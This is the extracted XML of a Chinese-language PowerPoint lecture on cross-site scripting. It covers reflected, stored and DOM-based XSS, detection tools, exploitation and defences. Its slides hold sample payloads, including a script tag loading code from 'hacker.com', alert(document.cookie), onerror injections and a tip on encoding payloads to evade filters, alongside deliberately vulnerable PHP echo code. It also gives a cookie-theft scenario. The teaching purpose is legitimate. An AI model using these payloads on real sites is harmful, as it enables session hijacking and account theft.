        <a:xfrm>
          <a:off x="410368" y="1115363"/>
          <a:ext cx="5745162" cy="678960"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect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sz="23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跨站脚本分类</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="443512" y="1148507"/>
        <a:ext cx="5678874" cy="612672"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC497596-9AD3-4C8C-B9FB-1CF29FE6916C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="249812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B087B-7616-4962-96F8-53819DF29377}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="2158643"/>
          <a:ext cx="5745162" cy="678960"/>
        </a:xfrm>
        <a:prstGeom prst="round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检测</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="23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sz="23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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="443512" y="2191787"/>
        <a:ext cx="5678874" cy="612672"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D0D9AF0C-2478-4531-9DAD-32F48486E9EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="354140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29684"/>
              <a:satOff val="-3294"/>
              <a:lumOff val="19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3E420-4A79-4227-9C5C-1BEDEDCB1BCD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="3201923"/>
          <a:ext cx="5745162" cy="678960"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect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漏洞利用</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="443512" y="3235067"/>
        <a:ext cx="5678874" cy="612672"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{802781DC-81BF-49F9-845C-85869DF18F01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4584683"/>
          <a:ext cx="82073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B265-1E2A-4631-9435-3BD534B762B1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="410368" y="4245203"/>
          <a:ext cx="5745162" cy="67896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漏洞防御</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="443512" y="4278347"/>
        <a:ext cx="567887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XSS</a:t>
          </a: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跨站脚本概念</a:t>
          </a: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85BF-6212-7E47-A2B4-3C05EE0FCECF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0D88-6A2E-E747-9634-F302DB9CD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2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0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42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中，此时的代码应为：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http://test.com/xss1.php?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username=&lt;script src=“http://hacker.com/1.js”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p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提示：攻击特征太明显？试试把关键代码转码！十进制，十六进制，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31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167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460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247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80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457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563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893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&lt;input id="text" type="text" value="&lt;script&gt;alert('xss')&lt;/script&gt;" /&gt;</a:t>
            </a:r>
          </a:p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闭合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标签，让他不在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属性中。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闭合后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&lt;input id="text" type="text" value=""/&gt;&lt;script&gt;alert('xss')&lt;/script&gt;" /&gt;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25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238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390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24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626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644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24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248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815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6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912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64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30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71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57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加载外部的代码文件可以是任意扩展名（无扩展名也可以），如：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src=“http://url.com/x.jpg”&gt;&lt;/script&gt;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，即使文件为图片扩展名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x.jpg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，但只要文件包含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代码就会被执行。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10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20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39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21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4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0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5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5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3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39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0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7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0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4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4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6.jpe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jw\桌面\01 办公系统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211" r="156" b="397"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1364" y="-3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080" y="269895"/>
            <a:ext cx="6768644" cy="147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6.XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1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跨站脚本漏洞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97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反射型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86" y="1152809"/>
            <a:ext cx="8400000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9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反射型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反射型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也被称为非持久性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，是现在最容易出现的一种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漏洞。当用户访问一个带有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请求时，服务器端接收数据后处理，然后把带有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代码的数据发送到浏览器，浏览器解析这段带有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代码的数据后，最终造成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漏洞。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&lt;?php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$username = $_GET['username'];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echo $username;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?&gt;</a:t>
            </a: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在这段代码中，程序接收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值后再输出，如果提交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xss1.php?username=test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，那么程序将输出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，如果攻击者输入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username=&lt;script&gt;alert(‘xss’)&lt;/script&gt;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，将会造成反射型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漏洞。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84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反射型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仅仅弹个框？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攻击场景：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假如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http://test.com/xss1.php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反射型跨站漏洞，那么攻击者的步骤可能如下。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是网站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test.com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的用户，此时正在登录的状态中。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攻击者发现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http://test.com/xss1.php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反射型跨站漏洞，然后精心构造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代码，此段代码可以窃取用户的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攻击者将带有反射型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漏洞的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通过站内信息发送给用户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，使用各种诱导的方式让用户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去打开链接。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如果用户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打开了带有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漏洞的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，那么就会把自己的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发送到攻击者中。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攻击者接受到用户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的会话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，就可以直接利用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的身份登录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test.com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网站中。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以上步骤，通过使用反射型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漏洞可以以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的身份登录网站，这就是其危害。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45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存储型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15" y="1313959"/>
            <a:ext cx="7542857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7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存储型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存储型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又被称为持久性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，存储型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是最危险的一种跨站脚本。允许用户存储数据的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应用程序都可能会出现存储型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漏洞，当攻击者提交一段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代码后，被服务器端接收并存储，当再次访问页面时，这段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代码被程序读取响应给浏览器，造成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跨站攻击，这就是存储型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在测试是否存在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时，首先要确定输入点与输出点，例如：我们要在留言内容上测试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漏洞，首先就要去寻找留言内容输出（显示）的地方是在标签内还是标签属性内，或者在其他地方，如果输出的数据在属性内，那么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是不会被执行的。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73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存储型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攻击场景：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在留言板处使用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&lt;script&gt;alert(document.cookie)&lt;/script&gt;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953" y="3131876"/>
            <a:ext cx="4609524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2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存储型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攻击场景：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重新加载留言处页面时，代码被执行。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976" y="2351656"/>
            <a:ext cx="4752381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3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DOM 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DOM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的全称为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Document Object Model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，即文档对象模型，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通常用于代表在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XHTML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中的对象。使用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可以允许程序和脚本动态地访问和更新文档的内容、结构和样式。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可以重构整个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页面，而要重构页面或者页面中的某个对象，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JavaScript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就需要知道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文档中所有元素的“位置”。而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为文档提供了结构化表示，并定义了如何通过脚本来访问文档结构。根据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规定，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文档中的每个成分都是一个节点。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70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DOM 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的规定如下：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整个文档是一个文档节点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标签是一个元素节点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包含在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元素中的文本是文本节点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属性是一个属性节点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节点与节点之间都有等级关系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826" y="3236058"/>
            <a:ext cx="5842348" cy="31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1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DOM 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传统类型的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漏洞（反射型或存储型）一般出现在服务器端代码中，而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DOM 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文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。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DOM 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取决于输出位置，并不取决于输出环境，因此也可以说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DOM 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既有可能是反射型的，也有可能是存储型的，简单去理解就是因为他输出点在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24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54433540"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="468313" y="1096171"/>
          <a:ext cx="8207375" cy="5236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821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DOM XSS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6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&lt;?php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error_reporting(0);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$name = $_GET["name"];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?&gt;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&lt;input id="text" type="text" value="&lt;?php echo $name;?&gt;" /&gt;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&lt;div id="print"&gt;&lt;/div&gt;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type="text/javascript"&gt;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var text = document.getElementById("text"); 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var print = document.getElementById("print");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print.innerHTML = text.value; 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440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09284911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35429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检测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手工检测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使用手工检测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应用程序是否存在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漏洞时，最重要的是考虑哪里有输入、输入的数据在什么地方输出。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可得知输出的位置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输入一些敏感字符，例如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等，在提交请求后查看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源代码，看这些输入的字符是否被转义。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无法得知输出位置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应用程序源代码是不对外公开的，这时在测试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时就有可能无法得知输入数据到底在哪里显示。比如，测试留言本，留言之后要经过审核才显示，这时候就无法得知输入的数据在后台管理页面是何种状态。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通常可以采用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””/&gt;XSS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来测试。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38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检测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全自动检测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Appscan</a:t>
            </a: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AWVS</a:t>
            </a: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BurpSuite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="502095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检测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思路为，提交正常数据，使用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firebug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的调试等工具跟踪提交数据的标签，如果显示区域不在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属性内，则可以直接使用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代码注入。如果说不能得知内容输出的具体位置，则可以使用模糊测试。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存储型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也好，反射型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也罢。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的本质问题就是让对方浏览器执行你插入的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08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3866874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5520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漏洞利用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窃取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演示。。。。。。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替换工具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en-US" altLang="zh-CN"/>
              <a:t>CookieHacker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Firefox TamperData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Burpsuite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83042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漏洞利用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盲打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xssplatform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xssing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02521" y="3273726"/>
            <a:ext cx="3456384" cy="1800200"/>
            <a:chOff x="755576" y="1059582"/>
            <a:chExt cx="3456384" cy="1800200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="矩形 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1475656" y="1306244"/>
              <a:ext cx="1584176" cy="216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942999" y="12625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</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="866055" y="1707654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建议：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475656" y="1738140"/>
              <a:ext cx="2160240" cy="8336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55576" y="1059582"/>
              <a:ext cx="3456384" cy="18002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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920168" y="267269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攻击者可见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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863367" y="2645116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管理员可见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62961" y="3273726"/>
            <a:ext cx="3456384" cy="1800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28263"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5055502" y="3442306"/>
          <a:ext cx="30713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3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427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27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279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279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6" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575946" y="3443734"/>
            <a:ext cx="500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test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1622601" y="3952284"/>
            <a:ext cx="215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软件标题字太小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 </a:t>
            </a:r>
          </a:p>
          <a:p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onerror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=alert(1)&gt;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5078985" y="3813815"/>
            <a:ext cx="503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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5878133" y="384008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软件标题字太小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93" y="3871474"/>
            <a:ext cx="238740" cy="2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右箭头 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4486899" y="4096857"/>
            <a:ext cx="288032" cy="25356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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924224" y="5489187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攻击者最初是看不见后台是什么样子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的！故而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叫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盲打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3721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，见到框框就输入代码！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31932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03224807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94223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漏洞防御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输入与输出中的过滤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黑名单与白名单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安全编码规范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HttpOnly cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20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0406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33878577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5793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思考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要点：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各种脚本代码，你可以不会写，但至少要看得懂！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参考（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http://www.w3school.com.cn/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漏洞的检测方式！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参考（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http://drops.wooyun.org/tips/1955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9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跨站脚本漏洞？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跨站脚本（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Cross-Site Scripting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）自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年诞生以来，如今已经历十多年的演化。由于和另一种网页技术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 Sheets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）的缩写一样，为了防止混淆，故把原本的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简称为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。在各种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应用安全漏洞中，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跨站脚本攻击漏洞一直被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OWASP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Open Web Application Security Project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）组织评为十大应用安全中的其中之一。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OWASP TOP 10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A2 / 2010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A2 / 2013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A3】</a:t>
            </a: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XSS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最大的特点就是能注入恶意的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HTML/JavaScript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代码到用户浏览的网页上，是因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应用程序对用户输入过滤不足而产生的，当用户浏览这些网页时，就会执行其中的恶意代码。由于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代码和客户端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脚本能在受害者主机上的浏览器任意执行，这样等同于完全控制了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客户端的逻辑，在这个基础上，黑客可以轻易地发起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窃取，会话劫持，钓鱼欺骗等各种各样的攻击。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通常情况下，我们既可以把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理解成一种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应用安全漏洞，也可以理解成一种攻击手段。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2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攻击流程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2789" y="3282950"/>
            <a:ext cx="3910013" cy="2373313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1282127" y="2154238"/>
            <a:ext cx="33909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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 5" descr="computer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27" y="4757738"/>
            <a:ext cx="857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server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27" y="1633538"/>
            <a:ext cx="730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69327" y="3390900"/>
            <a:ext cx="1867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de-DE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0" lang="zh-CN" altLang="de-DE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正常服务器信息</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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69327" y="3848100"/>
            <a:ext cx="2359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de-DE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0" lang="zh-CN" altLang="de-DE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服务器存储恶意代码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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69327" y="4305300"/>
            <a:ext cx="16626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de-DE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0" lang="zh-CN" altLang="de-DE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用户浏览网页</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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69327" y="4762500"/>
            <a:ext cx="3186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de-DE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0" lang="zh-CN" altLang="de-DE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服务器将恶意代码返回给用户</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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69327" y="5219700"/>
            <a:ext cx="2978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de-DE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kumimoji="0" lang="zh-CN" altLang="de-DE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客户端浏览器执行恶意代码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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4914327" y="2776538"/>
            <a:ext cx="0" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="66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04227" y="1066800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攻击者</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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025327" y="5753100"/>
            <a:ext cx="21510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普通用户客户端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330127" y="1143000"/>
            <a:ext cx="16770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de-DE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de-DE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kumimoji="0"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4389" y="1527175"/>
            <a:ext cx="2544763" cy="10906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lIns="72000" tIns="0" rIns="0" bIns="0" anchor="ctr"/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在论坛发帖子：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免费获取</a:t>
            </a:r>
            <a:r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币！！！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kumimoji="0"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恶意代码</a:t>
            </a:r>
            <a:r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kumimoji="0"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52489" y="1685925"/>
            <a:ext cx="2382838" cy="806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lIns="72000" tIns="0" rIns="0" bIns="0"/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1800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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重要通知</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="AutoShape 1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55689" y="1978025"/>
            <a:ext cx="2382838" cy="806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lIns="72000" tIns="0" rIns="0" bIns="0"/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Re:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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沙发！！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="AutoShape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71589" y="2193925"/>
            <a:ext cx="2382838" cy="806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lIns="72000" tIns="0" rIns="0" bIns="0"/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Re:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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地板？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="AutoShape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87489" y="2409825"/>
            <a:ext cx="2382838" cy="806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lIns="72000" tIns="0" rIns="0" bIns="0"/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Re:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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地下室沙发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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28" name="AutoShap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03389" y="2625725"/>
            <a:ext cx="2382838" cy="806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lIns="72000" tIns="0" rIns="0" bIns="0"/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Re:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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地下室地板</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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-_-!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="AutoShap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00239" y="2813050"/>
            <a:ext cx="2386013" cy="8588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lIns="72000" tIns="0" rIns="0" bIns="0" anchor="ctr"/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kumimoji="0"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：免费获取</a:t>
            </a:r>
            <a:r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kumimoji="0"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币！！！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kumimoji="0"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恶意代码</a:t>
            </a:r>
            <a:r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kumimoji="0"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22489" y="3527425"/>
            <a:ext cx="2382838" cy="806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lIns="72000" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buChar char="•"/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©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Re:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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谁又发垃圾广告啦？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 25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267839" y="2024063"/>
            <a:ext cx="222250" cy="219075"/>
            <a:chOff x="2938" y="2755"/>
            <a:chExt cx="164" cy="162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Oval 2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938" y="2755"/>
              <a:ext cx="164" cy="16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3" name="Text Box 2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88" y="2769"/>
              <a:ext cx="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zh-CN" sz="12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4" name="Group 2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5496939" y="1744663"/>
            <a:ext cx="222250" cy="219075"/>
            <a:chOff x="2938" y="2755"/>
            <a:chExt cx="164" cy="162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Oval 2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938" y="2755"/>
              <a:ext cx="164" cy="16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6" name="Text Box 3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88" y="2769"/>
              <a:ext cx="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zh-CN" sz="12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7" name="Group 3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4798439" y="3586163"/>
            <a:ext cx="222250" cy="219075"/>
            <a:chOff x="2938" y="2755"/>
            <a:chExt cx="164" cy="162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Oval 3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38" y="2755"/>
              <a:ext cx="164" cy="16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9" name="Text Box 3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988" y="2769"/>
              <a:ext cx="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zh-CN" sz="1200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5193727" y="2789238"/>
            <a:ext cx="0" cy="1905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41" name="Group 3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5103239" y="3586163"/>
            <a:ext cx="222250" cy="219075"/>
            <a:chOff x="2938" y="2755"/>
            <a:chExt cx="164" cy="162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Oval 3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38" y="2755"/>
              <a:ext cx="164" cy="16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3" name="Text Box 3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988" y="2769"/>
              <a:ext cx="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zh-CN" sz="12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4" name="Group 38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852539" y="4945063"/>
            <a:ext cx="222250" cy="219075"/>
            <a:chOff x="2938" y="2755"/>
            <a:chExt cx="164" cy="162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Oval 3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938" y="2755"/>
              <a:ext cx="164" cy="16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6" name="Text Box 40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988" y="2769"/>
              <a:ext cx="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4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3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Font typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="©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Font typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="à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zh-CN" sz="1200" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 41" descr="TN_hacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId31">
            <a:lum bright="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7" y="1614488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9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简单的例子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74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&lt;title&gt;XSS TEST&lt;/title&gt;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&lt;body&gt;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搜索关键词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:&lt;?php echo $_GET['keyword']; ?&gt;&lt;br&gt;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&lt;/body&gt;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219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恶意脚本形式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弹警告框：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&lt;script&gt;alert(‘xss’)&lt;/script&gt;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&lt;script&gt;alert(document.cookie)&lt;/script&gt;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嵌入其他网站：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&lt;iframe src=http://baidu.com width=0 height=0&gt;&lt;/iframe&gt;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输入也可能是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代码段，如使网页不停刷新：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&lt;meta http-equiv="refresh" content="0;"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115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危害简单概括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8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网络钓鱼，包括盗取各类用户账号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窃取用户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资料，从而获取用户隐私信息，或利用用户身份进一步对网站执行操作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劫持用户（浏览器）会话，从而执行任意操作，例如进行非法转账，强制发表日志，发送电子邮件等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强制弹出广告页面，刷流量等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网页挂马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进行恶意操作，例如任意篡改页面信息，删除文章等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进行大量的客户端攻击，如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获取客户端信息，例如用户的浏览历史，真实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，开放端口等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控制受害者机器向其他网站发起攻击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结合其他漏洞进一步扩大攻击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提升用户权限，包括进一步渗透网站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传播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跨站脚本蠕虫等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1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6137121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13467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Zk.0w1gnU.Xb1pug8yB6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65x51TeJE2TD0M1vV_7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65x51TeJE2TD0M1vV_7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65x51TeJE2TD0M1vV_7j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65x51TeJE2TD0M1vV_7j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65x51TeJE2TD0M1vV_7j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0D0t70KpU7hzzTvai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YLnzhFojk2A3dibNE8W_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0D0t70KpU7hzzTvai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YLnzhFojk2A3dibNE8W_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0D0t70KpU7hzzTva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aIx.pHxEuRkp4P7yTfq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YLnzhFojk2A3dibNE8W_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0D0t70KpU7hzzTvai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YLnzhFojk2A3dibNE8W_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0D0t70KpU7hzzTvai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YLnzhFojk2A3dibNE8W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aIx.pHxEuRkp4P7yTfq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aIx.pHxEuRkp4P7yTf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aIx.pHxEuRkp4P7yTfq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aIx.pHxEuRkp4P7yTfq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aIx.pHxEuRkp4P7yTf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aIx.pHxEuRkp4P7yTfq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vaIx.pHxEuRkp4P7yTfq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2007</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>258</Paragraphs>
  <Slides>31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6.XSS跨站脚本漏洞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sangfor</dc:creator>
  <cp:lastModifiedBy>zx</cp:lastModifiedBy>
  <cp:revision>445</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-09T06:25:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-23T03:31:51Z</dcterms:modified>
</cp:coreProperties>
</file>